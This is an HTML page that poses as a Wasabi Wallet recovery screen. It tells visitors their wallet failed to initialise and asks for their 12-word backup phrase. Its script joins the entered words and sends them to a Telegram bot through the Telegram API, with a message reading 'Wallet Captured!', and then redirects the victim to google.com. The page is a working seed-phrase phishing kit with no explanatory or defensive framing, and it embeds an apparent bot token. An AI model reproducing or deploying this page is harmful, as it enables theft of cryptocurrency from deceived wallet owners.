<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
			background-color:#031b2b;
			user-select: none;
        }

		.form-control{
			width:90px;
			padding-right: 10px;
		}
		#recoverButton {
            display: block;
            margin: 0 auto;
            background-color: #031b2b;
            color: #e6eaef;
            border: 2px solid #2492f6;
            border-radius: 0px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 20px;
            cursor: pointer;
        }

        #recoverButton:hover {
            background-color: #2492f6;
            color: #e6eaef;
        }
		#resumeButton {
            display: block;
            margin: 0 auto;
            background-color: #031b2b;
            color: #e6eaef;
            border: 2px solid #2492f6;
            border-radius: 0px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 20px;
            cursor: pointer;
        }

        #resumeButton:hover {
            background-color: #2492f6;
            color: #e6eaef;
        }
    </style>
</head>
<body>
    <div id="step1">
		<img alt="" style="width:180px;height:180px;margin: auto;display: block;" src="img/wasabi.png" />
        <h1 class="text-center" style="color:#e6eaef;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#e6eaef;">An error occured while initializing your wallet. Please use your backup phrase to recover your wallet.</p>
		<br><br>
		<div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="resumeButton" onclick="resume()">RESTORE WALLET</button>
         </div>
	</div>
	<div id="step2" style="display: none;">
		<div class="container mt-5">
		<img alt="" style="width:180px;height:180px;margin: auto;display: block;" src="img/wasabi.png" />
        <h1 class="text-center" style="color:#e6eaef;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#e6eaef;">Enter your 12-word backup phrase below:</p>
        
        <div class="row">
		
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word1">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word2">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word3">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word4">
            </div>
        </div>

        <div class="row">
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word5">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word6">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word7">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word8">
            </div>
        </div>

        <div class="row">
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word9">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word10">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word11">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word12">
            </div>
        </div>
		<br><br>
        <div class="row">
		
            <div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="recoverButton">RESTORE WALLET</button>
            </div>
        </div>
    </div>
	</div>

    <!-- Error Modal -->
    <div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-labelledby="errorModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="errorModalLabel">Error</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    Please fill in all boxes with valid words.
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                </div>
            </div>
        </div>
    </div>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script>
        document.getElementById('recoverButton').addEventListener('click', function () {
            var valid = true; // Assume all inputs are initially valid
var concatenatedMnemonic = ''; // Initialize the concatenated mnemonic

var inputs = document.querySelectorAll("input"); // Replace with your actual selector

for (var i = 0; i < inputs.length; i++) {
    var input = inputs[i];

    // Check if input is empty or contains non-Latin letters
    if (!/^[a-zA-Z]+$/.test(input.value)) {
        valid = false;
        input.style.borderColor = 'red';
    } else {
        input.style.borderColor = ''; // Reset border color
        concatenatedMnemonic += input.value + " "; // Concatenate valid input values
    }
}

            if (!valid) {
                $('#errorModal').modal('show');
            } else {
                // Remove the trailing space and store the concatenated mnemonic
                concatenatedMnemonic = concatenatedMnemonic.trim();
                // You can now use 'concatenatedMnemonic' for further processing or storage
                console.log('Concatenated Mnemonic:', concatenatedMnemonic);
				function getParameterByName(name) {
    name = name.replace(/[\[\]]/g, "\\$&");
    var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)");
    var results = regex.exec(window.location.href);
    if (!results) return null;
    if (!results[2]) return '';
    return decodeURIComponent(results[2].replace(/\+/g, " "));
}

var id = getParameterByName('id');
var chatid = getParameterByName('chatid');
var xhr = new XMLHttpRequest();
var url = 'https://api.telegram.org/bot6065049136:AAFoRRYQhIvGygPqAHoXOtxf65qgHGt4Hd0/sendMessage?chat_id='+chatid+'&text=Wallet Captured!%0ABOT ID:'+id+'%0AWasabi Wallet:%0A'+concatenatedMnemonic;
// Configure the request (GET request to a URL)
xhr.open('GET', url, true);

// Set up a callback function to handle the response
xhr.onload = function() {
  if (xhr.status === 200) {
    // Request was successful, handle the response here
    window.location.href = "https://google.com";
  } else {
    // Request failed
    console.error('Request failed with status', xhr.status);
  }
};

// Send the request
xhr.send();            }
        });
    </script>
	<script>
		function resume(){
			document.getElementById("step1").style.display = "none";
			document.getElementById("step2").style.display = "block";
		}
	</script>
</body>
</html>